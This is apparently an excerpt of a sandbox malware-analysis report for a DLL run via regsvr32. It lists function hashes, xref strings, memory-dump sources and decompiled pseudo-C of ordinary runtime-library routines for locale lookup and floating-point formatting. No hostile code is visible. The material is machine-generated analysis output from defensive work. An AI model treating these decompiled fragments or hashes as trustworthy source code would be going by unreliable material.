String ID: %$&$3$;cL$J7
API String ID: 0-1627999366
Opcode ID: 18b2b473a27a799896e4f6d2785bf90a267876b71ab08e9e855bd87571d46f63
Instruction ID: e7408fd237053f3c29396380e87e5bb265fed9a4d9f9422f64f1efbac21c3c9f
Opcode Fuzzy Hash: 18b2b473a27a799896e4f6d2785bf90a267876b71ab08e9e855bd87571d46f63
Instruction Fuzzy Hash: 3832D5719097888BEBF9CF24C8897D977F0FF44704F90651ED84E9A690DBB866488F42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014514 Relevance: 6.5, Strings: 5, Instructions: 287COMMON

Download Yara Rule

Strings

R^, xrefs: 00000001800149AF
=N, xrefs: 00000001800148C3
2, xrefs: 0000000180014536
5*-, xrefs: 00000001800149AB
ZU, xrefs: 0000000180014715

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5*-$=N$ZU$2$R^
API String ID: 0-3591394199
Opcode ID: bb1d6eb7030161a16d253db6a81db699c98e5a8854b46dce3d3e6ac66bc9a55d
Instruction ID: 7724188dd4e5cf52005c6427e59c66d2460b94fd415d5796230484c9bb746d4d
Opcode Fuzzy Hash: bb1d6eb7030161a16d253db6a81db699c98e5a8854b46dce3d3e6ac66bc9a55d
Instruction Fuzzy Hash: 16E1197051074D8FEB88CF24C89A6DE3FA0FB58398F555219FC4AA6290C778D695CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E50C Relevance: 6.5, Strings: 5, Instructions: 225COMMON

Download Yara Rule

Strings

6u, xrefs: 000000018000E6A9
XT, xrefs: 000000018000E629
ri, xrefs: 000000018000E780
br, xrefs: 000000018000E52A
+w, xrefs: 000000018000E760

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +w$6u$XT$br$ri
API String ID: 0-2037825276
Opcode ID: 2676d45436eb954209f5a2e21bd5a8304a5eb3ce6b678e3d7b326e26e4988652
Instruction ID: ca39b3bbf729964e5f303d5add46a8bac542d1890c14919d2ea7129e4463ce74
Opcode Fuzzy Hash: 2676d45436eb954209f5a2e21bd5a8304a5eb3ce6b678e3d7b326e26e4988652
Instruction Fuzzy Hash: E5A115715106499BCB88DF28C8C99ED3FB1FB483A8F95661CFC0A9B290C774D985CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800180C8 Relevance: 6.4, Strings: 5, Instructions: 199COMMON

Download Yara Rule

Strings

I, xrefs: 0000000180018214
AOZ, xrefs: 000000018001830B
$EHN, xrefs: 00000001800182B9
>, xrefs: 000000018001835D
EU, xrefs: 000000018001833D

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $EHN$>$AOZ$EU$I
API String ID: 0-3962013524
Opcode ID: 228afdc4e79dfaf18a350c1c1bd7523aacd5aa0f76349953cd5a42596b0da937
Instruction ID: dc1ebcee60942a166437ce33195dc9a2529979fa2925de0649de9cd3141beb5b
Opcode Fuzzy Hash: 228afdc4e79dfaf18a350c1c1bd7523aacd5aa0f76349953cd5a42596b0da937
Instruction Fuzzy Hash: F991F571D0060C8BDB68DFA8D58A6DDBFF0FF48344F14811AE419AB694D774AA4ACF42

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B078470 Relevance: 6.1, APIs: 4, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00007FFD7FFD2B078470(void* __edx, signed int __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, long long __r9) {
				signed int _t27;
				intOrPtr _t33;
				signed int _t49;
				signed long long _t60;
				long long _t68;
				long long _t71;
				void* _t74;
				signed long long _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t93;
				void* _t94;

				_t78 = __rdx;
				_t86 = _t85 - 0x50;
				_t84 = _t86 + 0x40;
				 *((long long*)(_t84 + 0x40)) = __rbx;
				 *((long long*)(_t84 + 0x48)) = __rsi;
				 *((long long*)(_t84 + 0x50)) = __rdi;
				_t60 =  *0x2b0c70a0; // 0xf787487f4682
				 *_t84 = _t60 ^ _t84;
				r13d = r8d;
				r14d = __edx;
				r12d =  *((intOrPtr*)( *__rcx + 4));
				r8d = 0;
				r9d = 0;
				_t27 = GetLocaleInfoW(??, ??, ??, ??);
				_t82 = _t27;
				_t49 = _t27;
				if (_t49 != 0) goto 0x2b0784cf;
				goto 0x2b0785a2;
				if (_t49 <= 0) goto 0x2b078538;
				_t6 = _t78 - 0x20; // -32
				if (_t6 - 2 < 0) goto 0x2b078538;
				_t74 = _t27 + _t27 + 0x10;
				if (_t74 - 0x400 > 0) goto 0x2b07851f;
				if (_t74 + 0xf - _t74 > 0) goto 0x2b078501;
				E00007FFD7FFD2B07A210(0 / _t27, 0xffffffffffffff0, _t93, _t94);
				_t87 = _t86 - 0xfffffff0;
				_t68 = _t87 + 0x40;
				if (_t68 == 0) goto 0x2b0784c8;
				 *_t68 = 0xcccc;
				goto 0x2b078532;
				E00007FFD7FFD2B0652E4(0xffffffffffffff0, _t68, _t74, _t82);
				if (0xfffffff0 == 0) goto 0x2b07853b;
				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
				goto 0x2b07853b;
				_t71 = __rdi;
				if (__rdi == 0) goto 0x2b0784c8;
				r9d = __esi;
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x2b07858f;
				_t33 =  *((intOrPtr*)(_t84 + 0x60));
				r9d = r9d | 0xffffffff;
				 *((long long*)(_t87 + 0x38)) = __rdi;
				 *((long long*)(_t87 + 0x30)) = __rdi;
				if (_t33 != 0) goto 0x2b07857e;
				 *((intOrPtr*)(_t87 + 0x28)) = 0;
				 *((long long*)(_t87 + 0x20)) = __rdi;
				goto 0x2b078587;
				 *((intOrPtr*)(_t87 + 0x28)) = _t33;
				 *((long long*)(_t87 + 0x20)) = __r9;
				WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				_t22 = _t71 - 0x10; // -16
				if ( *_t22 != 0xdddd) goto 0x2b0785a0;
				free(??);
				return E00007FFD7FFD2B064980(r12d,  *_t84 ^ _t84, __rdx, __rdi);
			}

0x7ffd2b078470
0x7ffd2b07847a
0x7ffd2b07847e
0x7ffd2b078483
0x7ffd2b078487
0x7ffd2b07848b
0x7ffd2b07848f
0x7ffd2b078499
0x7ffd2b0784a0
0x7ffd2b0784a3
0x7ffd2b0784a6
0x7ffd2b0784ad
0x7ffd2b0784b0
0x7ffd2b0784bb
0x7ffd2b0784c1
0x7ffd2b0784c4
0x7ffd2b0784c6
0x7ffd2b0784ca
0x7ffd2b0784cf
0x7ffd2b0784d3
0x7ffd2b0784de
0x7ffd2b0784e0
0x7ffd2b0784ec
0x7ffd2b0784f5
0x7ffd2b078505
0x7ffd2b07850a
0x7ffd2b07850d
0x7ffd2b078515
0x7ffd2b078517
0x7ffd2b07851d
0x7ffd2b07851f
0x7ffd2b07852a
0x7ffd2b07852c
0x7ffd2b078536
0x7ffd2b078538
0x7ffd2b07853e
0x7ffd2b078540
0x7ffd2b078554
0x7ffd2b078556
0x7ffd2b078559
0x7ffd2b07855f
0x7ffd2b07856a
0x7ffd2b078571
0x7ffd2b078573
0x7ffd2b078577
0x7ffd2b07857c
0x7ffd2b07857e
0x7ffd2b078582
0x7ffd2b078587
0x7ffd2b07858f
0x7ffd2b078599
0x7ffd2b07859b
0x7ffd2b0785c7

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00007FFD2B07860B), ref: 00007FFD2B0784BB
GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00007FFD2B07860B), ref: 00007FFD2B07854C
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00007FFD2B07860B), ref: 00007FFD2B078587
free.LIBCMT ref: 00007FFD2B07859B

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: InfoLocale$ByteCharMultiWidefree
String ID:
API String ID: 40707599-0
Opcode ID: d2b73d11294dd950e105d9b92421be71b80308523bcac0165169703b98794f88
Instruction ID: 357954be347d065109423dae33b5e79c43f0091b1fb339b954c1e0738b3c12a1
Opcode Fuzzy Hash: d2b73d11294dd950e105d9b92421be71b80308523bcac0165169703b98794f88
Instruction Fuzzy Hash: 8841D522B06B4186EB128F269D10579B3D5FB46BE8F584231DB5D43BE4EFBCE401A344

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07D118 Relevance: 5.8, Strings: 4, Instructions: 796
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 96%

			E00007FFD7FFD2B07D118(unsigned int __edx, long long __rbx, signed int* __rcx, void* __rdx, signed int* __r9, void* __r10, void* __r11) {
				signed int _t242;
				signed short _t255;
				signed short _t256;
				signed int _t272;
				signed short _t273;
				signed int _t274;
				signed int _t279;
				signed short _t283;
				signed short _t284;
				signed int _t300;
				signed short _t301;
				signed int _t302;
				signed int _t308;
				signed int _t311;
				void* _t314;
				signed int _t325;
				unsigned int _t329;
				void* _t345;
				signed short _t347;
				signed int _t355;
				signed short _t357;
				signed short _t358;
				signed short _t368;
				signed short _t369;
				intOrPtr _t402;
				signed int _t405;
				signed int _t406;
				signed int _t414;
				signed int _t415;
				unsigned int _t418;
				unsigned int _t419;
				unsigned int _t421;
				unsigned int _t422;
				signed short _t425;
				signed short _t426;
				signed int _t427;
				unsigned int _t428;
				unsigned int _t431;
				unsigned int _t438;
				unsigned int _t449;
				signed int _t459;
				void* _t468;
				signed int _t470;
				signed int _t493;
				signed int _t494;
				signed int _t525;
				signed int _t526;
				signed long long _t555;
				signed long long _t556;
				signed int* _t559;
				signed int* _t562;
				unsigned long long _t570;
				void* _t572;
				intOrPtr* _t573;
				void* _t579;
				void* _t581;
				char* _t582;
				void* _t584;
				signed short* _t585;
				void* _t589;
				void* _t591;
				signed long long _t592;
				char* _t597;
				intOrPtr* _t598;
				void* _t599;
				char* _t609;
				intOrPtr* _t611;
				char* _t612;
				void* _t613;
				intOrPtr* _t617;
				intOrPtr* _t618;
				signed short* _t620;
				signed short* _t621;
				long long _t623;
				unsigned long long _t626;
				void* _t633;

				_t577 = __rdx;
				 *((long long*)(_t591 + 0x10)) = __rbx;
				_push(_t584);
				_push(_t581);
				_push(_t623);
				_push(_t633);
				_t589 = _t591 - 0x27;
				_t592 = _t591 - 0xc0;
				_t555 =  *0x2b0c70a0; // 0xf787487f4682
				_t556 = _t555 ^ _t592;
				 *(_t589 + 0x17) = _t556;
				_t425 = __rcx[2] & 0x0000ffff;
				r10d =  *__rcx;
				_t559 = __r9;
				r9d = __rcx[1];
				r11d = 1;
				 *(_t589 - 0x4d) = __edx;
				r13d = 0;
				_t347 = _t425 & 0x8000;
				_t7 = _t577 - 1; // 0x7fff
				r15d = _t7;
				 *(_t589 - 0x39) = r8d;
				_t426 = _t425 & r15w;
				 *((long long*)(_t589 - 0x41)) = __r9;
				 *((intOrPtr*)(_t589 - 9)) = 0xcccccccc;
				 *((intOrPtr*)(_t589 - 5)) = 0xcccccccc;
				 *(_t589 - 1) = 0x3ffbcccc;
				 *(_t589 - 0x67) = _t347;
				_t242 = __r11 + 0x1f;
				r8d = __r11 + 0x2c;
				if (_t347 == 0) goto 0x2b07d1a3;
				__r9[0] = r8b;
				goto 0x2b07d1a6;
				__r9[0] = _t242;
				if (_t426 != 0) goto 0x2b07d1da;
				if (r9d != 0) goto 0x2b07d2eb;
				if (r10d != 0) goto 0x2b07d2eb;
				_t243 =  ==  ? r8d : _t242;
				__r9[0] = 0x3001;
				 *__r9 = r13w;
				__r9[0] =  ==  ? r8d : _t242;
				__r9[1] = r13b;
				goto 0x2b07db6c;
				if (_t426 != r15w) goto 0x2b07d2eb;
				 *__r9 = r11w;
				if (r9d != 0x80000000) goto 0x2b07d1f7;
				_t459 = r10d;
				if (_t459 == 0) goto 0x2b07d230;
				asm("inc ecx");
				if (_t459 < 0) goto 0x2b07d230;
				_t21 = _t559 + 4; // 0x5
				if (E00007FFD7FFD2B066870(_t556, _t21, __rdx, "1#SNAN") == 0) goto 0x2b07d2ca;
				r9d = 0;
				r8d = 0;
				 *((long long*)(_t592 + 0x20)) = _t623;
				E00007FFD7FFD2B06938C();
				asm("int3");
				if (0 == 0) goto 0x2b07d270;
				if (r9d != 0xc0000000) goto 0x2b07d270;
				if (r10d != 0) goto 0x2b07d2b1;
				_t23 = _t559 + 4; // 0x5
				if (E00007FFD7FFD2B066870(_t556, _t23, __rdx, "1#IND") == 0) goto 0x2b07d292;
				r9d = 0;
				r8d = 0;
				 *((long long*)(_t592 + 0x20)) = _t623;
				E00007FFD7FFD2B06938C();
				asm("int3");
				if (r9d != 0x80000000) goto 0x2b07d2b1;
				if (r10d != 0) goto 0x2b07d2b1;
				_t26 = _t559 + 4; // 0x5
				if (E00007FFD7FFD2B066870(_t556, _t26, __rdx, "1#INF") != 0) goto 0x2b07d29c;
				__r9[0] = 5;
				goto 0x2b07d2ce;
				r9d = 0;
				r8d = 0;
				 *((long long*)(_t592 + 0x20)) = _t623;
				E00007FFD7FFD2B06938C();
				asm("int3");
				_t30 = _t559 + 4; // 0x5
				_t597 = "1#QNAN";
				_t468 = E00007FFD7FFD2B066870(_t556, _t30, __rdx, _t597);
				if (_t468 != 0) goto 0x2b07d2d6;
				__r9[0] = 6;
				r11d = r13d;
				goto 0x2b07db6c;
				r9d = 0;
				r8d = 0;
				 *((long long*)(_t592 + 0x20)) = _t623;
				E00007FFD7FFD2B06938C();
				asm("int3");
				r8d = _t426 & 0x0000ffff;
				 *(_t589 - 0x17) = r10d;
				 *(_t589 - 0x13) = r9d;
				r8d = r8d * 0x4d10;
				r14d = 5;
				 *(_t589 - 0xf) = _t426;
				 *(_t589 - 0x19) = r13w;
				r12d = 0xbffd;
				_t40 = _t597 - 0x134312f4; // -323130100
				 *(_t589 - 0x49) = r14d;
				_t42 = _t584 - 1; // 0x4
				_t427 = _t42;
				_t355 = __rdx + _t40 >> 0x10;
				r9d = _t355;
				 *(_t589 - 0x61) = _t355;
				r9d =  ~r9d;
				if (_t468 == 0) goto 0x2b07d6c4;
				if (r9d >= 0) goto 0x2b07d36d;
				r9d =  ~r9d;
				_t470 = r9d;
				if (_t470 == 0) goto 0x2b07d6c4;
				r8d =  *(_t589 - 0x15);
				r9d = r9d >> 3;
				 *(_t589 - 0x51) = r9d;
				 *((long long*)(_t589 - 0x59)) = 0x2b0c8700;
				if (_t470 == 0) goto 0x2b07d6ac;
				_t617 = 0x7ffd2b0c86f4 + (_t556 + _t556 * 2) * 4;
				r10d = 0x8000;
				 *((long long*)(_t589 - 0x31)) = _t617;
				if ( *_t617 - r10w < 0) goto 0x2b07d3d3;
				_t570 =  *_t617;
				_t618 = _t589 + 7;
				 *(_t589 + 7) = _t570;
				 *((intOrPtr*)(_t589 + 0xf)) =  *((intOrPtr*)(_t617 + 8));
				 *((long long*)(_t589 - 0x31)) = _t618;
				 *((intOrPtr*)(_t589 + 9)) = _t355 - r11d;
				_t357 =  *(_t618 + 0xa) & 0x0000ffff;
				_t255 =  *(_t589 - 0xf) & 0x0000ffff;
				 *(_t589 - 0x65) = r13d;
				_t358 = _t357 & r15w;
				 *(_t589 - 0x29) = 0;
				_t256 = _t255 & r15w;
				 *(_t589 - 0x21) = r13d;
				r10d = _t556 + (_t570 >> 0x10);
				 *(_t589 - 0x69) = (_t357 & 0x0000ffff ^ _t255) & r10w;
				if (_t256 - r15w >= 0) goto 0x2b07d68c;
				if (_t358 - r15w >= 0) goto 0x2b07d68c;
				r15d = 0xbffd;
				if (r10w - r15w > 0) goto 0x2b07d686;
				if (r10w - 0x3fbf > 0) goto 0x2b07d449;
				 *(_t589 - 0x15) = 0;
				r15d = 0x7fff;
				goto 0x2b07d69f;
				if (_t256 != 0) goto 0x2b07d470;
				r10w = r10w + r11w;
				if (( *(_t589 - 0x11) & _t427) != 0) goto 0x2b07d470;
				if (r8d != 0) goto 0x2b07d470;
				if ( *(_t589 - 0x19) != 0) goto 0x2b07d470;
				 *(_t589 - 0xf) = r13w;
				r15d = 0x7fff;
				goto 0x2b07d6a8;
				if (_t358 != 0) goto 0x2b07d48d;
				r10w = r10w + r11w;
				if (( *(_t618 + 8) & _t427) != 0) goto 0x2b07d48d;
				if ( *((intOrPtr*)(_t618 + 4)) != r13d) goto 0x2b07d48d;
				if ( *_t618 == r13d) goto 0x2b07d436;
				_t598 = _t589 - 0x25;
				_t428 = r14d;
				r15d = _t428;
				_t572 = _t584 + _t584;
				if (_t428 <= 0) goto 0x2b07d4fb;
				r12d = 0;
				r9d = r12d;
				_t402 = _t556 + _t572;
				if (_t402 -  *((intOrPtr*)(_t598 - 4)) < 0) goto 0x2b07d4d4;
				if (_t402 - ( *(_t618 + 8) & 0x0000ffff) * ( *(_t589 + _t572 - 0x19) & 0x0000ffff) >= 0) goto 0x2b07d4d7;
				r9d = r11d;
				 *((intOrPtr*)(_t598 - 4)) = _t402;
				if (r9d == 0) goto 0x2b07d4e4;
				 *_t598 =  *_t598 + r11w;
				r15d = r15d - r11d;
				if (r15d > 0) goto 0x2b07d4b6;
				r13d = 0;
				_t599 = _t598 + 2;
				if (_t428 - r11d > 0) goto 0x2b07d497;
				r9d =  *(_t589 - 0x21);
				r8d =  *(_t589 - 0x29);
				r10w = r10w + 0xc002;
				if (r10w <= 0) goto 0x2b07d566;
				if ((0x80000000 & r9d) != 0) goto 0x2b07d560;
				r9d = r9d + r9d;
				r8d = r8d + r8d;
				r10w = r10w + 0xffff;
				r9d = r9d |  *(_t589 - 0x25) >> 0x0000001f;
				 *(_t589 - 0x29) = r8d;
				 *(_t589 - 0x25) = _t581 + _t581 | r8d >> 0x0000001f;
				 *(_t589 - 0x21) = r9d;
				if (r10w > 0) goto 0x2b07d52a;
				_t493 = r10w;
				if (_t493 > 0) goto 0x2b07d5d3;
				r10w = r10w + 0xffff;
				if (_t493 >= 0) goto 0x2b07d5d3;
				_t405 =  ~(r10w & 0xffffffff) & 0x0000ffff;
				r10w = r10w + _t405;
				 *(_t589 - 0x5d) = r10w;
				r10d =  *(_t589 - 0x65);
				_t494 =  *(_t589 - 0x29) & r11b;
				if (_t494 == 0) goto 0x2b07d58c;
				r10d = r10d + r11d;
				_t431 =  *(_t589 - 0x25);
				r8d = r8d >> 1;
				r9d = r9d >> 1;
				r8d = r8d | _t431 << 0x0000001f;
				 *(_t589 - 0x25) = _t431 >> 0x00000001 | r9d << 0x0000001f;
				 *(_t589 - 0x29) = r8d;
				if (_t494 != 0) goto 0x2b07d583;
				r10d =  *(_t589 - 0x5d) & 0x0000ffff;
				 *(_t589 - 0x21) = r9d;
				if (r10d == 0) goto 0x2b07d5d3;
				 *(_t589 - 0x29) = r8w & 0xffffffff | r11w;
				r8d =  *(_t589 - 0x29);
				goto 0x2b07d5d7;
				if (( *(_t589 - 0x29) & 0x0000ffff) - 0x8000 > 0) goto 0x2b07d5f1;
				r8d = r8d & 0x0001ffff;
				if (r8d != 0x18000) goto 0x2b07d639;
				_t406 = _t405 | 0xffffffff;
				if ( *(_t589 - 0x27) != _t406) goto 0x2b07d633;
				 *(_t589 - 0x27) = r13d;
				if ( *(_t589 - 0x23) != _t406) goto 0x2b07d627;
				_t272 =  *(_t589 - 0x1f) & 0x0000ffff;
				 *(_t589 - 0x23) = r13d;
				if (_t272 != 0xffff) goto 0x2b07d61d;
				 *(_t589 - 0x1f) = 0x8000;
				r10w = r10w + r11w;
				goto 0x2b07d62d;
				_t273 = _t272 + r11w;
				 *(_t589 - 0x1f) = _t273;
				goto 0x2b07d62d;
				_t274 = _t273 + r11d;
				 *(_t589 - 0x23) = _t274;
				r9d =  *(_t589 - 0x21);
				goto 0x2b07d639;
				 *(_t589 - 0x27) = _t274 + r11d;
				r15d = 0x7fff;
				r14d = 5;
				if (r10w - r15w < 0) goto 0x2b07d65d;
				r9d =  *(_t589 - 0x51);
				goto 0x2b07d68f;
				r10w = r10w |  *(_t589 - 0x69);
				 *(_t589 - 0x13) = r9d;
				r9d =  *(_t589 - 0x51);
				 *(_t589 - 0x19) =  *(_t589 - 0x27) & 0x0000ffff;
				_t279 =  *(_t589 - 0x25);
				 *(_t589 - 0x17) = _t279;
				r8d =  *(_t589 - 0x15);
				 *(_t589 - 0xf) = r10w;
				goto 0x2b07d6a8;
				r15d = 0x7fff;
				asm("sbb eax, eax");
				 *(_t589 - 0x15) = r13d;
				 *(_t589 - 0x11) = (_t279 & 0x80000000) + 0x7fff8000;
				r8d = r13d;
				 *(_t589 - 0x19) = r13d;
				if (r9d != 0) goto 0x2b07d37a;
				r12d = 0xbffd;
				goto 0x2b07d6cb;
				r8d =  *(_t589 - 0x15);
				r9d = 0x3fff;
				_t283 =  *(_t589 - 0x11) >> 0x10;
				if (_t283 - r9w < 0) goto 0x2b07d996;
				r9d = 0x8000;
				 *(_t589 - 0x65) = r13d;
				r10d = __r9 - 1;
				 *(_t589 - 0x61) =  *(_t589 - 0x61) + r11w;
				_t368 =  *(_t589 + 1) & 0x0000ffff;
				r15d = _t368 & 0x0000ffff;
				_t369 = _t368 & r10w;
				 *(_t589 - 0x29) = 0;
				r15w = r15w ^ _t283;
				_t284 = _t283 & r10w;
				 *(_t589 - 0x21) = r13d;
				r15w = r15w & r9w;
				r9d = _t556 + _t572;
				if (_t284 - r10w >= 0) goto 0x2b07d980;
				if (_t369 - r10w >= 0) goto 0x2b07d980;
				if (r9w - r12w > 0) goto 0x2b07d980;
				r10d = 0x3fbf;
				if (r9w - r10w > 0) goto 0x2b07d751;
				 *(_t589 - 0x11) = r13d;
				goto 0x2b07d990;
				if (_t284 != 0) goto 0x2b07d772;
				r9w = r9w + r11w;
				if (( *(_t589 - 0x11) & 0x7fffffff) != 0) goto 0x2b07d772;
				if (r8d != 0) goto 0x2b07d772;
				if ( *(_t589 - 0x19) != 0) goto 0x2b07d772;
				 *(_t589 - 0xf) = r13w;
				goto 0x2b07d996;
				if (_t369 != 0) goto 0x2b07d78c;
				r9w = r9w + r11w;
				if (( *(_t589 - 1) & 0x7fffffff) != 0) goto 0x2b07d78c;
				if ( *((intOrPtr*)(_t589 - 5)) != r13d) goto 0x2b07d78c;
				if ( *((intOrPtr*)(_t589 - 9)) == r13d) goto 0x2b07d748;
				_t573 = _t589 - 0x25;
				r13d = r14d;
				_t579 = _t581 + _t581;
				if (r14d <= 0) goto 0x2b07d7f5;
				r14d = r13d;
				_t585 = _t589 - 1;
				_t620 = _t589 + _t579 - 0x19;
				r14d = r14d & r11d;
				r8d = 0;
				r10d = _t556 + _t579;
				if (r10d -  *(_t573 - 4) < 0) goto 0x2b07d7d1;
				if (r10d - ( *_t620 & 0x0000ffff) * ( *_t585 & 0x0000ffff) >= 0) goto 0x2b07d7d4;
				r8d = r11d;
				 *(_t573 - 4) = r10d;
				if (r8d == 0) goto 0x2b07d7e1;
				 *_t573 =  *_t573 + r11w;
				r13d = r13d - r11d;
				_t621 =  &(_t620[1]);
				if (r13d > 0) goto 0x2b07d7b2;
				r14d =  *(_t589 - 0x49);
				r14d = r14d - r11d;
				r13d = 0;
				 *(_t589 - 0x49) = r14d;
				if (r14d > 0) goto 0x2b07d793;
				r8d =  *(_t589 - 0x21);
				r10d =  *(_t589 - 0x29);
				r12d = 0xffff;
				r9w = r9w + 0xc002;
				if (r9w <= 0) goto 0x2b07d86d;
				if ((0x80000000 & r8d) != 0) goto 0x2b07d867;
				r8d = r8d + r8d;
				r10d = r10d + r10d;
				r9w = r9w + r12w;
				r8d = r8d |  *(_t589 - 0x25) >> 0x0000001f;
				 *(_t589 - 0x29) = r10d;
				 *(_t589 - 0x25) = _t581 + _t581 | r10d >> 0x0000001f;
				 *(_t589 - 0x21) = r8d;
				if (r9w > 0) goto 0x2b07d831;
				_t525 = r9w;
				if (_t525 > 0) goto 0x2b07d8d2;
				r9w = r9w + r12w;
				if (_t525 >= 0) goto 0x2b07d8d2;
				_t414 =  ~(r9w & 0xffffffff) & 0x0000ffff;
				r9w = r9w + _t414;
				_t526 =  *(_t589 - 0x29) & r11b;
				if (_t526 == 0) goto 0x2b07d88d;
				_t345 =  *(_t589 - 0x65) + r11d;
				_t438 =  *(_t589 - 0x25);
				r10d = r10d >> 1;
				r8d = r8d >> 1;
				r10d = r10d | _t438 << 0x0000001f;
				 *(_t589 - 0x25) = _t438 >> 0x00000001 | r8d << 0x0000001f;
				 *(_t589 - 0x29) = r10d;
				if (_t526 != 0) goto 0x2b07d884;
				_t562 =  *((intOrPtr*)(_t589 - 0x41));
				 *(_t589 - 0x21) = r8d;
				if (_t345 == 0) goto 0x2b07d8d2;
				 *(_t589 - 0x29) = r10w & 0xffffffff | r11w;
				r10d =  *(_t589 - 0x29);
				goto 0x2b07d8d6;
				if (( *(_t589 - 0x29) & 0x0000ffff) - 0x8000 > 0) goto 0x2b07d8f0;
				r10d = r10d & 0x0001ffff;
				if (r10d != 0x18000) goto 0x2b07d939;
				_t415 = _t414 | 0xffffffff;
				if ( *(_t589 - 0x27) != _t415) goto 0x2b07d933;
				 *(_t589 - 0x27) = r13d;
				if ( *(_t589 - 0x23) != _t415) goto 0x2b07d927;
				_t300 =  *(_t589 - 0x1f) & 0x0000ffff;
				 *(_t589 - 0x23) = r13d;
				if (_t300 != r12w) goto 0x2b07d91d;
				 *(_t589 - 0x1f) = 0x8000;
				r9w = r9w + r11w;
				goto 0x2b07d92d;
				_t301 = _t300 + r11w;
				 *(_t589 - 0x1f) = _t301;
				goto 0x2b07d92d;
				_t302 = _t301 + r11d;
				 *(_t589 - 0x23) = _t302;
				r8d =  *(_t589 - 0x21);
				goto 0x2b07d939;
				 *(_t589 - 0x27) = _t302 + r11d;
				if (r9w - 0x7fff < 0) goto 0x2b07d95c;
				r15w =  ~r15w;
				r8d = r13d;
				asm("sbb eax, eax");
				 *(_t589 - 0x11) = 0x7fff8000;
				goto 0x2b07d99b;
				r9w = r9w | r15w;
				 *(_t589 - 0x13) = r8d;
				 *(_t589 - 0x19) =  *(_t589 - 0x27) & 0x0000ffff;
				_t308 =  *(_t589 - 0x25);
				 *(_t589 - 0xf) = r9w;
				 *(_t589 - 0x17) = _t308;
				r8d =  *(_t589 - 0x15);
				goto 0x2b07d99b;
				r15w =  ~r15w;
				asm("sbb eax, eax");
				 *(_t589 - 0x11) = (_t308 & 0x80000000) + 0x7fff8000;
				_t418 = r13d;
				r8d = r13d;
				_t311 =  *(_t589 - 0x61);
				r12d =  *(_t589 - 0x4d);
				 *_t562 = _t311;
				if (( *(_t589 - 0x39) & r11b) == 0) goto 0x2b07d9c8;
				r12d = r12d + _t311;
				if (r12d > 0) goto 0x2b07d9c8;
				_t212 = _t556 + 0xd; // 0x2d
				_t314 =  ==  ? _t212 : 0x20;
				goto 0x2b07d1c4;
				r9d =  *(_t589 - 0x11);
				 *(_t589 - 0xf) = r13w;
				_t216 = _t556 - 0xd; // 0x8
				r10d = _t216;
				r12d =  >  ? 0x15 : r12d;
				r9d = r9d >> 0x10;
				r9d = r9d - 0x3ffe;
				r8d = r8d + r8d;
				r8d = r8d | _t418 >> 0x0000001f;
				_t449 =  *(_t589 - 0x11) +  *(_t589 - 0x11) | r8d >> 0x0000001f;
				_t419 = _t418 + _t418;
				if (r12d != 0x15) goto 0x2b07d9ef;
				 *(_t589 - 0x15) = r8d;
				 *(_t589 - 0x19) = _t419;
				if (r9d >= 0) goto 0x2b07da49;
				r9d =  ~r9d;
				r10d = r9b & 0xffffffff;
				if (r10d <= 0) goto 0x2b07da49;
				r8d = r8d >> 1;
				r10d = r10d - r11d;
				r8d = r8d | _t449 << 0x0000001f;
				_t421 = _t419 >> 0x00000001 | r8d << 0x0000001f;
				if (r10d > 0) goto 0x2b07da23;
				 *(_t589 - 0x15) = r8d;
				 *(_t589 - 0x19) = _t421;
				r14d =  &(_t621[0]);
				_t222 =  &(_t562[1]); // 0x5
				_t582 = _t222;
				_t609 = _t582;
				if (r14d <= 0) goto 0x2b07db28;
				_t626 =  *(_t589 - 0x19);
				r8d = r8d + r8d;
				_t422 = _t421 + _t421;
				r9d = _t585 - 2 + _t585 - 2;
				 *(_t589 + 7) = _t626;
